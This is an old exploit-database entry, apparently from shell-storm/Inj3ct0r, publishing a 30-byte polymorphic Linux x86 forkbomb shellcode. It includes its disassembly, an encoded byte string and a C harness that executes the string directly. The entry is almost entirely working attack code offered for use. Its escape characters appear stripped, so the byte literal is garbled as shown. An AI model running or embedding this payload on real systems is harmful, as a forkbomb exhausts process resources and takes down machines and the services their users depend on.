linux/x86 polymorphic forkbombe - 30 bytes
Posted on 21 April 2010
========================================== linux/x86 polymorphic forkbombe - 30 bytes ========================================== /* Title: Linux x86 polymorphic forkbombe - 30 bytes Author: Jonathan Salwan <submit@shell-storm.org> Web: http://www.shell-storm.org ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Disassembly of section .text: 08048054 <_a>: 8048054: b0 02 mov $0x2,%al 8048056: cd 80 int $0x80 8048058: eb fa jmp 8048054 <_a> */ #include <stdio.h> char shellcode[] = "xebx11x5ex31xc9xb1x06x80" "x6cx0exffx01x80xe9x01x75" "xf6xebx05xe8xeaxffxffxff" "xb1x03xcex81xecxfb"; int main() { fprintf(stdout,"Lenght: %d ",strlen(shellcode)); (*(void (*)()) shellcode)(); } # Inj3ct0r.com [2010-04-21]